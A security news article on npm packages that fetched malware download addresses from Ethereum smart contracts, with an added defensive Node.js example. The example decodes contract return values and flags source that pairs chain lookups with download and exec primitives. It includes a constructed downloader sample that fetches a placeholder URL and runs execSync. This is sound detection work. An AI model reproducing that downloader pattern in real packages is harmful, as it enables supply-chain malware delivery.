Hackers Use Ethereum Smart Contracts to Hide Malware in NPM Packages

  • Two NPM packages used Ethereum smart contracts to conceal malicious URLs and install downloader malware
  • Attackers built fake GitHub repositories with fabricated commits and multiple accounts to boost credibility.
  • At least 23 crypto-related malware campaigns hit open-source repositories in 2024, showing evolving attack tactics.

Cybersecurity researchers have identified a new method used by hackers to distribute malware through Ethereum smart contracts. ReversingLabs, a software supply chain security firm, uncovered two malicious NPM packages that retrieved the location of their next-stage payload from a smart contract on the Ethereum blockchain. Because the packages contained no hard-coded malicious URL, only a contract lookup, the technique let the attackers slip past conventional security scans that key on suspicious addresses in package code.

The discovery shows how attackers continue to treat open-source repositories as an attack surface. The NPM packages, “colortoolsv2” and “mimelib2,” were uploaded in July and acted as downloaders. Rather than hosting harmful links directly, they pulled command-and-control addresses stored inside Ethereum smart contracts.

How the Attack Worked

Once installed on a device, the packages queried the blockchain to retrieve the hidden URLs. Those addresses then directed the system to download second-stage malware, which carried out the intended malicious activity. Because the first step is an ordinary read of a smart contract, the same kind of query legitimate crypto tooling makes, traditional monitoring tools had a harder time flagging it. The indirection hides the URL from static analysis of the package itself; it does not hide the subsequent payload download from runtime network monitoring, and since the address lives in contract storage it can be updated on-chain (if the contract allows it) without republishing the package, so blocking a single URL is not enough.
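To make the mechanism concrete from the defender's side, here is an added example (not code from ReversingLabs, the article, or the packages themselves) in Node.js. It does two things: decodes the hex that an Ethereum node returns for an eth_call on a string-returning function, so an analyst can read the URL a package would have fetched from the contract, and runs a static heuristic that flags package source combining an on-chain lookup with download or execute primitives. The ABI layout is the standard Solidity encoding for a single `string` return; the rule set, the sample sources, the placeholder address and the `example.invalid` URLs are all constructed for illustration.

```javascript
// Added example (not from ReversingLabs or the article): triage helpers for
// npm packages that look like blockchain-backed downloaders.
//  1. decodeAbiString(): turn an eth_call result for a `string`-returning
//     function back into text (what URL would the package have fetched?).
//  2. scoreSource(): static heuristic flagging source that pairs an on-chain
//     lookup with download/execute primitives. Rules are an assumption, not a
//     published detection; tune them to your own package corpus.
// All sample inputs below are constructed; addresses and URLs are placeholders.

// --- 1. ABI encoding/decoding of a dynamic `string` return value -----------
// Layout: word 0 = byte offset of the string (0x20), word 1 = byte length,
// then the UTF-8 bytes zero-padded to a multiple of 32.
function encodeAbiString(s) {
  const data = Buffer.from(s, 'utf8');
  const padded = Math.ceil(data.length / 32) * 32;
  const out = Buffer.alloc(64 + padded);                 // zero-filled
  out.writeBigUInt64BE(32n, 24);                          // offset: low 8 bytes of word 0
  out.writeBigUInt64BE(BigInt(data.length), 56);          // length: low 8 bytes of word 1
  data.copy(out, 64);
  return '0x' + out.toString('hex');
}

function decodeAbiString(hex) {
  const buf = Buffer.from(hex.replace(/^0x/, ''), 'hex');
  if (buf.length < 64) throw new Error('response too short for an ABI string');
  const offset = Number(buf.readBigUInt64BE(24));
  if (offset + 32 > buf.length) throw new Error('offset points outside response');
  const len = Number(buf.readBigUInt64BE(offset + 24));
  const start = offset + 32;
  if (start + len > buf.length) throw new Error('declared length exceeds response');
  return buf.subarray(start, start + len).toString('utf8');
}

// --- 2. Static heuristic over package source -------------------------------
// Reading the chain alone (price feeds, token metadata) is normal; reading the
// chain AND then downloading or executing something is the downloader pattern.
const CHAIN_LOOKUP = [
  { name: 'ethers/web3 import', re: /(?:require\(\s*|from\s+)['"](?:ethers|web3)['"]/ },
  { name: 'raw eth_call JSON-RPC', re: /['"]eth_call['"]/ },
  { name: '20-byte address literal', re: /\b0x[0-9a-fA-F]{40}\b/ },
];
const FETCH_EXEC = [
  { name: 'HTTP download', re: /\b(?:https?\.get|fetch|axios\.get)\s*\(/ },
  { name: 'process execution', re: /\bchild_process\b|\b(?:exec|execSync|spawn|spawnSync)\s*\(/ },
  { name: 'dynamic code evaluation', re: /\beval\s*\(|new\s+Function\s*\(/ },
];

function scoreSource(src) {
  const hits = (rules) => rules.filter((r) => r.re.test(src)).map((r) => r.name);
  const chain = hits(CHAIN_LOOKUP);
  const fetchExec = hits(FETCH_EXEC);
  return { chain, fetchExec, suspicious: chain.length > 0 && fetchExec.length > 0 };
}

// Lifecycle hooks let such code run at `npm install` time, before anyone has
// read the package; surface them alongside the source score.
function installHooks(pkgJson) {
  const scripts = (pkgJson && pkgJson.scripts) || {};
  return ['preinstall', 'install', 'postinstall'].filter((k) => k in scripts);
}

// Constructed samples (not the real packages' code).
const SUSPICIOUS_SRC = `
const { ethers } = require('ethers');
const https = require('https');
const { execSync } = require('child_process');
const provider = new ethers.JsonRpcProvider('https://rpc.example.invalid');
const c = new ethers.Contract('0x1111111111111111111111111111111111111111',
  ['function link() view returns (string)'], provider);
c.link().then((url) => https.get(url, (res) => handle(res)));
function handle(res) { /* write body to disk, then: */ execSync('node s2.js'); }
`;
const BENIGN_SRC = `
import { ethers } from 'ethers';
const provider = new ethers.JsonRpcProvider(process.env.RPC_URL);
const token = new ethers.Contract(process.env.TOKEN, ['function symbol() view returns (string)'], provider);
export const symbol = () => token.symbol();
`;

if (typeof require !== 'undefined' && require.main === module) {
  const resp = encodeAbiString('https://example.invalid/stage2.js'); // constructed eth_call result
  console.log('contract returned:', decodeAbiString(resp));
  console.log('suspicious sample:', scoreSource(SUSPICIOUS_SRC));
  console.log('benign sample:', scoreSource(BENIGN_SRC));
  console.log('install hooks:', installHooks({ scripts: { postinstall: 'node index.js' } }));
}
```

In practice you would feed `decodeAbiString` the `result` field of the JSON-RPC response captured from the package's eth_call, and run `scoreSource` over every file in the unpacked tarball; a package that reads a contract, has an install hook, and then fetches or executes something is worth a manual look even when no URL appears anywhere in its source.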

ReversingLabs researcher Lucija Valentić explained the approach in a blog post. She noted that while blockchain-linked malware has appeared before, this particular method introduced a new evasion strategy. Hosting malicious instructions within smart contracts allowed the attackers to obscure their operations inside Ethereum’s decentralized environment.

Broader Social Engineering Campaign

The malware packages were not isolated incidents but part of a larger social engineering effort. Threat actors established convincing GitHub repositories designed to resemble legitimate cryptocurrency trading bots. These repositories included fabricated commits, multiple fake maintainer accounts, and carefully written documentation to appear authentic.

Researchers noted that attackers also created fake user accounts to follow repositories and simulate community interest. These steps increased the credibility of the repositories and tricked developers into downloading compromised code.

Evolution of Repository Attacks

Security teams recorded at least 23 crypto-related malware campaigns on open-source repositories in 2024 alone. According to ReversingLabs, this recent campaign demonstrated an evolution in tactics. Combining blockchain functionality with deception strategies presented new challenges for defenders.

Although Ethereum was the focus of the latest report, other platforms have been exploited in similar ways. In April, a fake GitHub repository posing as a Solana trading bot distributed malware that stole crypto wallet credentials. Attackers have also targeted Bitcoin-related libraries, such as “Bitcoinlib,” by embedding malicious code to compromise development environments.

The use of Ethereum smart contracts to host malicious commands underscores the complexity of current threats. ReversingLabs emphasized that the smart contracts in this case were not exploited through any vulnerability; they were used as designed, as public storage for data, with the payload URLs written there deliberately. This method created an indirect channel for delivering malware while avoiding immediate detection.

